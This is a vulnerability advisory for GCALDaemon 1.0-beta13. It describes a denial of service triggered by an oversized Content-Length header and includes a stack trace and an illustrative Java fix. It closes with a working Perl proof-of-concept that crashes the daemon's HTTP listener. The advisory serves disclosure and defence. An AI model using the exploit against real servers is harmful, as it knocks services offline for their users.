GCALDaemon is "an OS-independent Java program that offers two-way synchronization between Google Calendar and various iCalendar compatible calendar applications. GCALDaemon is primarily designed as a calendar synchronizer but it can also be used as a Gmail notifier, Address Book importer, Gmail terminal and RSS feed converter".
Sunbird/Kontact/Firefox/ThunderBird/Mozilla Calendar all share calendars over HTTP, uploading the calendar file with an HTTP PUT and fetching or refreshing it with an HTTP GET. GCALDaemon's built-in HTTP server keeps these HTTP messages in sync with a specified Google Calendar. An input validation flaw allows an HTTP request with an abnormal Content-Length value to be crafted; such a malformed request can trigger a denial of service caused by a fatal Java out-of-memory error.
Credit:
The information has been provided by Luca Carettoni.
Vulnerable Systems:
* GCALDaemon version 1.0-beta13
Using a crafted HTTP request, an attacker could trigger a denial of service caused by a java.lang.OutOfMemoryError when the Java heap space is exhausted. In the file "org/gcaldaemon/core/http/HTTPListener.java", GCALDaemon's built-in HTTP server parses the HTTP request and its header parameters without validating them. At line 490 of that file, the value of the "Content-Length" header is used to size a new byte array; when the requested size is large enough, the allocation triggers a fatal Java error that blocks the HTTP daemon:
Exception in thread "HTTP listener" java.lang.OutOfMemoryError: Java heap space
at org.gcaldaemon.core.http.HTTPListener.readRequest(HTTPListener.java:490)
at org.gcaldaemon.core.http.HTTPListener.run(HTTPListener.java:167)
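The missing check, sketched as an added example (not GCALDaemon's own code and not the vendor's fix): the declared length is parsed and bounded before any buffer is allocated. The class and method names and the 4 MiB cap are assumptions chosen for illustration.

```java
import java.io.ByteArrayInputStream;
import java.io.IOException;
import java.io.InputStream;

// Added example, not GCALDaemon code. BoundedBodyReader, parseContentLength and
// readBody are hypothetical names; MAX_BODY_BYTES is an assumed limit.
public class BoundedBodyReader {
    static final int MAX_BODY_BYTES = 4 * 1024 * 1024;

    // Parse and validate the header value before any allocation happens.
    static int parseContentLength(String value) throws IOException {
        long n;
        try {
            n = Long.parseLong(value.trim());
        } catch (NumberFormatException e) {
            throw new IOException("400: malformed Content-Length");
        }
        if (n < 0) throw new IOException("400: negative Content-Length");
        if (n > MAX_BODY_BYTES) throw new IOException("413: body too large");
        return (int) n;
    }

    // Read exactly the declared number of bytes; the buffer is sized only
    // after the declared length has passed validation.
    static byte[] readBody(InputStream in, String contentLength) throws IOException {
        int declared = parseContentLength(contentLength);
        byte[] body = new byte[declared];
        int off = 0;
        while (off < declared) {
            int r = in.read(body, off, declared - off);
            if (r < 0) throw new IOException("400: body shorter than Content-Length");
            off += r;
        }
        return body;
    }

    public static void main(String[] args) throws IOException {
        // Constructed sample inputs: one valid body, then three rejected lengths.
        InputStream ok = new ByteArrayInputStream("BEGIN:VCALENDAR".getBytes("US-ASCII"));
        System.out.println("accepted bytes: " + readBody(ok, "15").length);
        for (String bad : new String[] {"1000000000", "-1", "abc"}) {
            try {
                readBody(new ByteArrayInputStream(new byte[0]), bad);
            } catch (IOException e) {
                System.out.println(bad + " -> " + e.getMessage());
            }
        }
    }
}
```

A per-request cap still lets many concurrent connections each claim a buffer up to the limit, so it is normally paired with a connection limit and a socket read timeout.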
Exploit:
The provided proof-of-concept can trigger the issue.
--------------------------------------------
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket;
my $host = shift || die "Usage: $0 host [port]\n";
my $port = shift || 9090;
my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort => $port, PeerProto => 'tcp')
or die "error: $!\n";
print "GCALDaemom DoS Expoit\n";
print "Just 4 seconds...\n";
sleep 4;
$sock->send("GET / HTTP/1.1\r\n");
$sock->send("Content-Length: 1000000000\r\n\r\n");
$sock->close;
print "\n\nNo more sync!\n";
--------------------------------------------